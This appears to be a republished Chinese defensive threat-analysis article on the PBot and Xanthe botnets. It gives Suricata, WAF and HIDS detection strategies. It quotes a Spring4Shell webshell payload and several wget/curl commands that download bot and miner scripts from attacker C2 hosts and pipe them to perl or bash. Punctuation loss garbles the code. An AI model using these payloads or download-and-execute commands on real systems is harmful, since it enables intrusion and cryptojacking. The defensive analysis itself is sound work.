应用办公生活信息教育商业
投稿投诉
商业财经
汽车智能
教育国际
房产环球
信息数码
热点科技
生活手机
晨报新闻
办公软件
科学动态
应用生物
体育时事

B站安全防御系列僵尸网络

  本期作者
  曲妍峰
  资深安全工程师
  01。僵尸网络
  僵尸网络Botnet是指采用一种或多种传播手段,利用bot(僵尸程序)病毒感染和控制数万个主机即黑客常说的傀儡机或肉鸡(肉机),组织成一个个命令与控制(commandandcontrol,CC)节点。控制僵尸网络的攻击机称为僵尸主控机(Botmaster),主控机通过CC服务器向bot发布命令来发送伪造的虚假数据包或是垃圾数据包,达到使攻击目标瘫痪并拒绝服务(DDoS)的目的。据公开报道显示,唐山一骇客曾控制了6万台计算机对某音乐网站进行分布式拒绝服务(DDoS)攻击,造成该网站无法正常提供服务,损失上百万元人民币。
  1。1主要特点
  1。僵尸网络是一个可控制的网络,它具有一定的分布性,随着bot程序的不断传播而不断有新位置的僵尸计算机添加到这个网络中来。
  2。采用了一系列恶意传播手段形成,例如高危漏洞攻击、邮件投送等各种病毒与蠕虫的传播手段,都可以用来进行Botnet的传播,从这个意义上讲,恶意程序bot也是一种病毒或蠕虫。
  3。Botnet最主要的特点是可以一对多地执行相同的恶意行为,比如可以同时对某目标网站进行分布式拒绝服务(DDos)攻击,同时发送大量的垃圾邮件等,而正是这种一对多的控制关系,使得攻击者能够以极低的代价高效地控制大量的资源为其服务。
  1。2活跃度统计
  利用威胁情报收集手段对僵尸网络活跃情况进行统计分析,从安全社区论坛、国内外厂商报告、安全研究机构等多处进行情报数据采集,如各僵尸网络的IOC(IndicatorsofCompromise)情报获取频率、相关报告数量、攻击活动时间等,并结合WAF防护日志研判,分析统计近3个月内活跃情况如下表。安全部门会定期根据活跃僵尸网络排名制定安全防御策略并实施系列防护手段,由于篇幅有限,本文将重点介绍针对近期排名一、二的僵尸网络所采取的防御策略。
  02。PBot僵尸网络
  2。1资料背景
  PBot僵尸网络家族是近年来异常活跃的P2P僵尸网络,善于利用新漏洞发起攻击,如Spring4Shell漏洞(CVE202222965)、GitLabCEEERCE漏洞(CVE202122205)等。因其bot模块为GitHub开源的IRCBot(采用Perl语言编写),且病毒脚本中包含perlbot关键字而得名。据公开资料显示该僵尸网络正通过大量攻击互联网主机植入恶意bot脚本构建僵尸网络来进行挖矿牟利,目前已有上万个受害主机失陷。
  2。2入侵钻石模型
  威胁情报分析领域的入侵钻石模型理论可以用于对僵尸网络组织进行分析,该模型基于集合和图论,分类并创建入侵活动模型,模型的基础是一个原子元素(事件),并由至少四个互连(链接)的特征(节点)组成:技战术手段,基础设施,受害者和影响危害。根据入侵钻石模型理论对PBot僵尸网络家族特征刻画分析及档案建立:攻击技术手段(恶意代码、工具、漏洞):Spring4Shell漏洞(CVE202222965)、GitLabCEEERCE漏洞(CVE202122205)利用的网络基础设施(IP、域名、邮箱、URL):主机IP攻击目标特征(行业、地理):互联网行业攻击影响危害(最终目的):挖矿、DDoS
  2。3技术分析
  执行流程:攻击者首先利用Spring4Shell(CVE202222965)漏洞、GitLabCEEERCE(CVE202122205)漏洞向受影响的脆弱主机植入恶意文件,包含恶意脚本jui。sh、僵尸网络bot模块、lans(下载ssh暴破模块)。恶意脚本jui。sh会下载挖矿shell脚本45。647。txt进行门罗币挖矿并运行僵尸网络bot模块lan构建僵尸网络,恶意脚本lans会从C2(89。44。9。246)下载lan。jpg实现SSH暴破实现横向传播,最终构成挖矿僵尸网络。
  2。3。1Spring4Shell漏洞(CVE202222965)
  攻击者利用Spring4Shell(CVE202222965)漏洞向受影响的脆弱主机植入恶意挖矿脚本及bot模块。Spring4Shell是一个高危远程代码执行(RCE)漏洞,影响JDK9上运行的所有SpringMVC、SpringWebFlux应用程序。分析Spring4Shell漏洞原理,并结合Pbot利用方式总结请求中存在如下特征:
  特殊请求头getheaders{prefix:lt;,suffix:,Thismayseemstrange,butthisseemstobeneededtobypasssomecheckthatlooksforRuntimeinthelogpatternc:Runtime,}
  攻击paylaodclass。module。classLoader。resources。context。parent。pipeline。first。pattern257Bprefix7Di20java。io。InputStream20in203D20257Bc7Di。getRuntime()。exec(request。getParameter(22cmd22))。getInputStream()3B20int20a203D2013B20byte5B5D20b203D20new20byte5B20485D3B20while((a3Din。read(b))!3D1)7B20out。println(new20String(b))3B207D20257Bsuffix7Diclass。module。classLoader。resources。context。parent。pipeline。first。suffix。jspclass。module。classLoader。resources。context。parent。pipeline。first。directorywebappsROOTclass。module。classLoader。resources。context。parent。pipeline。first。prefixshellclass。module。classLoader。resources。context。parent。pipeline。first。fileDateFormat
  下载并执行僵尸网络bot模块GETshell。jsp?pwdk3rwincmdwgetqO89。44。9。246jperlHTTP1。1
  检测思路防护策略lWAF:Web应用防火墙(WebApplicationFirewall),通过执行一系列针对HTTPHTTPS的安全策略来专门为Web应用提供防护的一款安全产品,是B站安全防护体系的第一道防线lNIDS:网络入侵检测系统(NetworkIntrusionDetectionSystem),是安全部门基于suricata自主研发的网络入侵检测系统。通过被动地监测网络上传输的原始流量,对获取的网络数据进行处理,从中提取有用的信息,再通过与已知攻击特征相匹配(策略规则配置)来识别攻击事件lIPS:入侵防御系统(IntrusionPreventionSystem),检测网络或网络设备间非法流量传输行为的安全防护设备lHIDS:主机型入侵检测系统(HostbasedIntrusionDetectionSystem),作为监视器和分析器,监视主机系统动态的行为以及整个计算机系统的状态
  特殊请求头
  a)使用WAF配置安全策略,检测外网存在特殊请求头的request,并实时拦截,策略配置如下:
  a)配置suricata规则,检测产线IDC中存在特殊请求头的request,当发送恶意攻击请求时服务端成功响应后产生告警,对流联动检测规则编写如下:
  alerthttpanyanyanyany(msg:CVE202222965:Spring4Shell远程命令执行漏洞检测Header;flow:toserver,established;content:prefix;httpheader;nocase;content:;httpheader;nocase;content:suffix;httpheader;nocase;content:lt;;httpheader;nocase;flowbit:set,name1;sid:500005;metadata:bycustom;)alerthttpanyanyanyany(msg:CVE202222965:Spring4Shell远程命令执行漏洞检测HeaderResponse;flow:toclient,established;content:200;httpstatcode;content:OK;httpstatmsg;flowbit:isset,name1;sid:500006;metadata:bycustom;)
  攻击payload
  a)使用WAF配置安全策略,检测外网存在特殊body的request,并实时拦截,策略配置如下:
  配置suricata规则,检测产线IDC中存在特殊请求body的request,当发送恶意攻击请求时服务端成功响应后产生告警,对流联动检测规则编写如下:
  alerthttpanyanyanyany(msg:CVE202222965:Spring4Shell远程命令执行漏洞检测Request;flow:toserver,established;content:prefix;httpclientbody;nocase;content:suffix;httpclientbody;nocase;content:getRuntime();httpclientbody;nocase;content:class。module。classLoader。resources。context。parent。pipeline。first。pattern;httpclientbody;nocase;pcre:{prefix}isjava。io。InputStreamsinss{c}i。getRuntime()。exec(request。getParameter(。?))。getInputStream();Ri;flowbit:set,name2;sid:500007;metadata:bycustom;)alerthttpanyanyanyany(msg:CVE202222965:Spring4Shell远程命令执行漏洞检测BodyResponse;flow:toclient,established;content:200;httpstatcode;content:OK;httpstatmsg;flowbit:isset,name2;sid:500008;metadata:bycustom;)
  下载并执行僵尸网络bot模块
  a)使用WAF配置安全策略,检测Pbot下载执行僵尸网络bot模块的GET请求,并实时拦截,策略配置如下:
  a)配置suricata规则,检测产线IDC中Pbot下载执行僵尸网络bot模块的GET请求,当发送恶意攻击请求时服务端成功响应后产生告警,对流联动检测规则编写如下:
  alerthttpanyanyanyany(msg:Pbot僵尸网络恶意下载执行检测;flow:toserver,established;content:shell。jsp;httpuri;nocase;content:cmdwget;httpuri;nocase;content:89。44。9。246;httpheader;flowbit:set,name3;flowbit:noalert;sid:500009;metadata:bycustom;)alerthttpanyanyanyany(msg:Pbot僵尸网络恶意下载执行检测Response;flow:toclient,established;content:200;httpstatcode;content:OK;httpstatmsg;flowbit:isset,name3;sid:500010;metadata:bycustom;)
  2。3。2GitLabCEEERCE(CVE202122205)
  攻击者利用GitLabCEEERCE(CVE202122205)漏洞向受影响的脆弱主机植入恶意挖矿脚本及bot模块。此漏洞由于GitLab没有正确验证传递给文件解析器的图像文件,导致高危远程代码执行(RCE)。分析GitLabCEEERCE利用方式,并结合Pbot利用方式总结请求中存在如下特征:
  获取用户cookie
  RCE
  使用登陆请求返回的Cookie值和csrftoken值,利用漏洞接口uploadsuser上传包含恶意代码的图片文件(如下载僵尸网络的bot模块),实现RCE
  检测思路防护策略
  恶意图片上传
  a)使用WAF配置安全策略,检测外网存在Gitlab的uploadsuser接口上传包含恶意命令的图片文件请求,并实时拦截,策略配置如下:
  a)配置suricata规则,检测产线IDC中对Gitlab的uploadsuser接口上传包含恶意命令的图片文件请求,并与Gitlab登陆态获取请求联动检测:
  alerthttpanyanyanyany(msg:Gitlab登陆请求;flow:toserver,established;content:GET;httpmethod;nocase;content:userssignin;httpuri;nocase;flowbit:set,gitlab;flowbit:noalert;sid:500010;metadata:bycustom;)alerthttpanyanyanyany(msg:CVE202122205:Gitlabexiftool远程命令执行漏洞;flow:toserver,established;content:uploadsuser;nocase;httpuri;fastpattern;content:gitlabsession;nocase;httpcookie;content:Copyright;nocase;httpclientbody;flowbit:isset,gitlab;sid:500011;metadata:bycustom;)
  2。3。3僵尸网络bot模块下载
  利用上述漏洞,可下载并执行以下三种恶意脚本jui。sh、僵尸网络bot模块pp、恶意脚本lans,在流量传输监控中可检测拦截请求中包含的相关下载命令。
  1。恶意脚本jui。sh会下载并运行僵尸网络bot模块lan(使用Perl编写)来构建僵尸网络,并下载挖矿shell脚本45。647。txt进行门罗币挖矿,下载命令如下:wgetqO89。44。9。246lanperlcurls89。44。9。246lanperlwgetqO89。44。9。246all45。647。txtbashcurls89。44。9。246all45。647。txtbash
  2。僵尸网络bot模块pp是使用Perl编写的DDos攻击模块,下载命令如下:wgetqOrun。psybnc。orgppperlcurlsrun。psybnc。orgppperl
  3。恶意脚本lans会从C2(89。44。9。246)下载ssh暴破模块lan。jpg(压缩包文件,包含ssh暴破脚本、暴破字典及生成器)来实现内网横向暴破,lans下载命令如下:wgetqO89。44。9。246lanscurls89。44。9。246lans
  检测思路防护策略
  jui。sh
  使用WAF配置安全策略,检测外网存在lan模块下载请求:
  b)配置suricata规则,检测产线IDC中lan模块下载请求:alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块lan模块下载检测;flow:toclient,established;content:lan;httpheader;nocase;fastpattern;pcre:(wgetcurl)。?(89。44。9。246lanperl)Ri;sid:500020;metadata:bycustom;)alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块lan模块下载检测;flow:toclient,established;content:lan;httpclientbody;nocase;fastpattern;pcre:(wgetcurl)。?(89。44。9。246lanperl)Ri;sid:500021;metadata:bycustom;)
  c)使用WAF配置安全策略,检测外网存在shell脚本45。647。txt下载请求:
  d)配置suricata规则,检测产线IDC中shell脚本45。647。txt下载请求:
  alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块lan模块下载检测;flow:toclient,established;content:。txt;httpheader;nocase;fastpattern;pcre:(wgetcurl)。?(89。44。9。246all。。txtbash)Ri;sid:500022;metadata:bycustom;)alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块lan模块下载检测;flow:toclient,established;content:。txt;httpclientbody;nocase;fastpattern;pcre:(wgetcurl)。?(89。44。9。246all。。txtbash)Ri;sid:500023;metadata:bycustom;)
  pp模块
  a)使用WAF配置安全策略,检测外网存在pp模块下载请求:
  b)配置suricata规则,检测产线IDC中pp模块下载请求
  alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块pp模块下载检测;flow:toclient,established;content:pp;httpheader;nocase;fastpattern;pcre:(wgetcurl)。(run。psybnc。orgppperl)Ri;sid:500024;metadata:bycustom;)alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块pp模块下载检测;flow:toclient,established;content:pp;httpclientbody;nocase;fastpattern;pcre:(wgetcurl)。(run。psybnc。orgppperl)Ri;sid:500025;metadata:bycustom;)
  c)根据pp模块功能特点,检测产线IDC中DDos请求,由于规则数量众多,仅列举部分规则:
  alertudpanyanyany53(msg:DDosDNSBIND9DynamicUpdateDoSattempt;bytetest:1,,40,2;bytetest:1,,0,5;bytetest:1,,0,1;content:000006;offset:8;content:c00c00ff;distance:2;classtype:attempteddos;sid:500026;metadata:bycustom;)alerttcpEXTERNALNETanySMTPSERVERS25(msg:DDosExcessiveSMTPMAILFROMDDoS;flow:toserver,established;content:MAILFROM3a;nocase;window:0;id:0;threshold:typelimit,trackbysrc,count30,seconds60;classtype:denialofservice;sid:500027;rev:2;metadata:bycustom;)alertudpEXTERNALNET123HOMENET123(msg:DDosPotentialInboundNTPdenialofserviceattempt(repeatedmode7request);dsize:1;content:17;threshold:typelimit,count1,seconds60,trackbysrc;classtype:attempteddos;sid:500028;rev:2;metadata:bycustom;)
  lans模块
  a)使用WAF配置安全策略,检测外网从C2(89。44。9。246)下载ssh暴破模块lans请求:
  b)配置suricata规则,检测产线IDC中从C2(89。44。9。246)下载ssh暴破模块lans请求:
  alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块pp模块下载检测;flow:toclient,established;content:lans;httpheader;nocase;fastpattern;pcre:(wgetcurl)。(89。44。9。246lans)Ri;sid:500029;metadata:bycustom;)alerthttpanyanyanyany(msg:Pbot僵尸网络bot模块pp模块下载检测;flow:toclient,established;content:lans;httpclientbody;nocase;fastpattern;pcre:(wgetcurl)。(89。44。9。246lans)Ri;sid:500030;metadata:bycustom;)
  c)根据pp模块功能特点,使用IPS检测ssh横向暴破行为:
  03Xanthe挖矿僵尸网络
  3。1资料背景
  多家安全厂商报告显示,一款名为Xanthe的僵尸网络近两年正活跃进行挖矿活动,Xanthe是一个加密劫持恶意软件家族,其主要目标是劫持系统资源以挖掘Monero加密货币。Xanthe采用各种方法在网络中传播,例如收集客户端证书以使用ssh传播到已知主机,或传播到配置错误的DockerAPI的系统。最新报告显示,Xanthe木马除了继续从事挖矿的老本行外,新版本中还添加了投递名为brickerbotv2的Mirai僵尸网络bot程序的功能,攻击者可以借此实现对外发起DDoS攻击的目的。
  3。2入侵钻石模型
  根据威胁情报分析领域的入侵钻石模型理论,可以从以下角度对PBot僵尸网络家族特征刻画分析及档案建立:攻击技术手段(恶意代码、工具、漏洞):fczyo、alduro、sesa。txt利用的网络基础设施(IP、域名、邮箱、URL):主机IP攻击目标特征(行业、地理):互联网行业攻击影响危害(最终目的):挖矿
  3。3技术分析
  Xanthe挖矿僵尸网络的恶意功能分别集成在各个恶意脚本中,主要分为以下3个模块:
  http:209。141。34。37fczyo
  http:209。141。34。37alduro
  http:209。141。34。37sesa。txt
  3。3。1fczyo模块
  lqbot()函数:将http:45。61。184。81x86文件下载到本地并执行,分析代码内容发现,x86文件是基于开源Mirai代码改编的ELF可执行程序,类似网上流行的Mirai僵尸网络样本,具有反调试、单例运行、阻止重启设备等功能,且在运行后会自删除,并通过连接45。61。184。81:81地址来接收主控机下发的DDoS攻击指令,并支持多种DDos攻击类型,包括tcpsyn、tcpack、tcpstomp、udpdns、udpplain等
  检测思路防御策略
  a)使用NIDS检测产线流量中的恶意x86文件传输,文件以md5值唯一识别,若发现恶意文件告警则立即上机清理,规则配置如下:
  b)防火墙封禁可以连接DDoS指令的恶意地址45。61。184。81
  host函数:分析host函数源码,发现此函数主要目的是将131。153。142。106pool。hashvault。pro矿池地址写入本地的etchost文件
  检测思路防御策略
  a)HIDS检测etchost文件是否被修改,若修改则产生告警并介入处理,策略配置如下:
  b)防火墙直接封禁矿池地址
  3。3。3。alduro模块
  filegetgo函数:会执行下载http:209。141。34。37adnckil挖矿程序请求,分析恶意程序发现采用了UPX加壳,脱壳处理后可以看到它是编译于2022。7。13日的开源XMRig矿机6。18。0版本
  检测思路防御策略
  a)IPS文件检测adnckil挖矿木马下载,md5值为3932979ca166dc69cca192490318f700,规则配置如下:
  b)使用NIDS监测产线流量中可执行文件下载,规则如下:alerthttpEXTERNALNETanyHOMENETany(msg:Executableandlinkingformat(ELF)filedownloadOverHTTP;flow:established;flowbits:isnotset,ET。ELFDownload;filedata;content:7FELF;within:4;flowbits:set,ET。ELFDownload;reference:url,www。itee。uq。edu。aucristinastudentsdavidhonoursThesis96bff。htm;reference:url,doc。emergingthreats。netbinviewMain2000418;classtype:policyviolation;sid:2019240;rev:1;metadata:createdat20220925,updatedat20221013;)
  lsshkeysgo函数:往authorizedkeys文件内写入攻击者的SSH公钥,实现免密登录
  检测思路防御策略
  a)HIDS定时监控authorizedkeys文件文件是否被写入特殊SSH公钥
  3。3。3。sesa。txt模块
  lsesa。txt模块与fczyo模块存在相同指令,即修改etchosts文件,阻断受害主机上原本存在的安全软件以及竞争对手的网络连接,达到独占网络带宽的目的l禁用AppArmor,AppArmor是Linux内核的一个安全模块,其允许系统管理员将每个程序与一个安全配置文件关联,可以指定程序可以读、写或运行哪些文件,是否可以打开网络端口等,从而限制程序的功能,达到访问控制的目的。
  检测思路防御策略
  a)同fczyo模块中host函数检测思路相同,使用HIDS监控etchosts文件改动
  b)HIDS监测主机是否执行systemctlstopapparmor命令
  作者:曲妍峰
  来源:微信公众号:哔哩哔哩技术
  出处:https:mp。weixin。qq。comsX9l4M0RzVJJeNGXmx5TrBw

中国足坛再现风波?曝3人已逃到国外,名嘴透露为前国脚和总经理从国足前主帅李铁到足协掌门人陈戌源,再到中国足协前任副主席王登峰,这些曾经在中国足坛有着举足轻重地位的人物,如今却相继落马,现状令人感到十分悲哀。无论是李铁也好,还是陈戌源王登……涉及公积金贷款额度和首套房首付比例!日照出台楼市新政近日日照多个部门联合印发关于《日照市促进房地产市场平稳健康发展的若干措施意见》的通知日照市促进房地产市场平稳健康发展的若干措施意见为贯彻落实《日照……2023年买主板必看各家主板型号定位详解之华硕篇2023年开年之初,给大家做一期图文栏目,关于各家主板厂商的型号大全。如果你要装机买主板,可以参考参考。今天这一期,先来看主板一哥:华硕。华硕主板型号众多,大致划分如下系……年轻人很不容易,嘲笑他们是孔乙己,很没意思!很无聊!今天的年轻人,非常不容易。就业的压力,内卷的压力,搬砖的压力,生活的压力这些压力之外,开始多了一个舆论压力。最近,称年轻人是当代孔乙己之风愈演愈烈。不少媒体和砖家说……快消一周大事集锦(3月13日嗨罐咖啡完成天使轮战略融资361快消八谈洽洽食品一周大事加加食品洽洽食品:公司将提高研发费用投入提升营销费用投入产出比3月13日,洽洽食品在投资者互动平台表示,公司会持续提高基础研究和新品研发能力……感谢李铁中国足球更应该感谢李铁。我关注足球还是北京国安队最红火的年代,高峰,高洪波,符宾,区楚良的时代。国安队歌的嘹亮也曾经心潮澎湃过,为国安队的每一场比赛而激动。高……老人保护牙齿需要注意的地方因为老年人的年龄原因,很多情况下牙齿的状态不是很好,所以,在老年人保护牙齿的时候,有些地方比年轻人更需要注意。1。老年人需要更加积极地防治各种能够引发牙齿松动和脱落的疾病……新一线城市年轻人的下一站,是云南,还是北上广?《中国经济周刊》记者郭霁瑶想到要回去就头疼,真的想留在这里生活。面对着阳光下的洱海,涂涂如此感叹。这是00后女生涂涂辞职后的散心之旅,也是她第六次来到云南。而她口中那个想……为什么你的iphone电池耗电如此之快?在行业中,iPhone拥有续航时间最长的电池,得益于软件和硬件完美兼容和优化。但是如果你的iPhone电池容量下降很快,续航时间越来越短,可能有以下几个原因。图片来……千年盛世,梦回江湖一段风花雪月的故事,一首荡气回肠的离歌,一人一梦一盅酒,开启恣意随性的江湖生活。《千年》手游旨在还原一个真实的江湖,通过不同角色扮演,修炼武功功法,一路升级打怪,最终实现你的江……一个简易的四层板设计案例这是一个简易的四层板设计案例,通过这个案例,你可以掌握阻抗匹配的计算、练习高速信号走线。案例介绍自制电脑HUB扩展器,基于CS5268设计,支持HDMI,PD2。0,US……方力申认爱谈新恋情女友曾因不幸事提分手方力申与邓丽欣于2016年分手,自此一直单身,纵使传出不少绯闻,却被他一一否认,最近他再传出新恋情,女方是自称艺术家的叶萱(Maple),但有指她是韩国摄理教会总会长郑明析XQ……
你越哄,孩子越爱哭!这么做比发脾气更有效行了行了,别哭了,我带你去买玩具!这点小事有什么好哭的,再哭我就把你扔这里。孩子来到这个世界,发出的第一个讯号就是哭声,在今后的童年生活中,哭泣仿佛成了他们最常使用……人一旦心存芥蒂。。天晴晴冷,应该好好享受周末陪娃时光。。。。只是,成年人的世界从来都是不会预料到那一刻会被琐碎的小事弄的一地鸡毛!很多时候,工作和生活其实是没办法分清的,即使是休息时……你知道双枪会给出答案这个梗吗?抖音奖励哥的关于我是谁双枪会给出答案这句话最近很火,相信不少小伙伴都有刷到过他的视频。下面小编也为大家整理带来了双枪会给出答案表情包大全,奖励哥关于我是谁双枪会给出答案表情包无……摔下舞台还坚持带伤演唱?被嘲土吃软饭,张杰一路走来并不容易OMG!张杰从高高的舞台升降电梯上摔下来了!大概所有看到坠落视频的人,都会像现场粉丝一样吓得心里一颤。可即使是如此重的摔伤,张杰依然淡定地继续完成了接下来的演唱,硬……体育界不搞饭圈那一套,人间清醒樊振东再次发文呼吁抵制饭圈不良极目新闻记者林楚晗10月17日,奥运冠军樊振东再次发文回应球迷关注的热点问题,并呼吁抵制饭圈不良风气,并重申不收礼物只收信。人间清醒樊振东这次,樊振东通过樊振……00后小花格局,赵今麦口碑飙升,张子枫一骑绝尘,刘浩存有争议演艺圈一定是需要不断更新换代、新老传承的,老戏骨不可能演一辈子戏,新人也必须磨练然后挑大梁。惊喜的是,近几年涌现出来的00后,个顶个的都是颜值和演技兼具的实力派!所以,不……国家地理摄影师发布10大旅行相机!两品牌击败佳能索尼霸榜总是分享一系列美照的《国家地理》,拥有一群资格老且厉害的摄影师,在官方的新近发布文章中,摄影师汤姆布莱恩分享由他们评点的10款适合旅行的相机,其中富士与徕卡就一口气占据6席,不……杜兰特7次50只能排现役第5,他前面是哪些大神?今日,在篮网116比104战胜活塞的比赛中,杜兰特31投16中,三分10中5,罚球15中14,狂砍51分7篮板9助攻,其中得分创赛季新高。算上今天的比赛,杜兰特已经在常规……枸杞!你会吃吗?经常我们能看到一句类似调侃的话人到中年不得已,保温杯里泡枸杞。那么这样做到底对不对呢?当然这句话还有下半句,文末揭晓。天天喝枸杞泡水,是不是在交智商税?我们先来具体……韦德生涯缔造的5大纪录,能打破一项都能够被称为超巨韦德生涯缔造的5大纪录,能打破一项都能够被称为超巨!相信很多球迷都会探讨谁才是NBA历史上最出色的得分后卫,在得分后卫上大家第一时间想到的就是科比和乔丹,除了这两位顶尖球……传奇3经典重燃,神舰传说,重拾当年的记忆自2003年传奇3引入国内,就引起了一片热潮,刚开始由光通代理,10年盛大代理运营。传奇3拥有韩国游戏中罕见的立体音效,体现了游戏坚实的功底,是当时最火的网游之一,巅峰时刻更能……小米12x曝光,120Hz5000mAh,骁龙870处理器坐小米一直以来都是比较受欢迎的手机品牌,不仅颜值高,性价比也不错,深受用户的喜欢和支持,比如之前发布的小米9SE版本,小屏旗舰手机销量从发布到现在都卖得比较好,最近网上又曝光了小……
友情链接:易事利快生活快传网聚热点七猫云快好知快百科中准网快好找文好找中准网快软网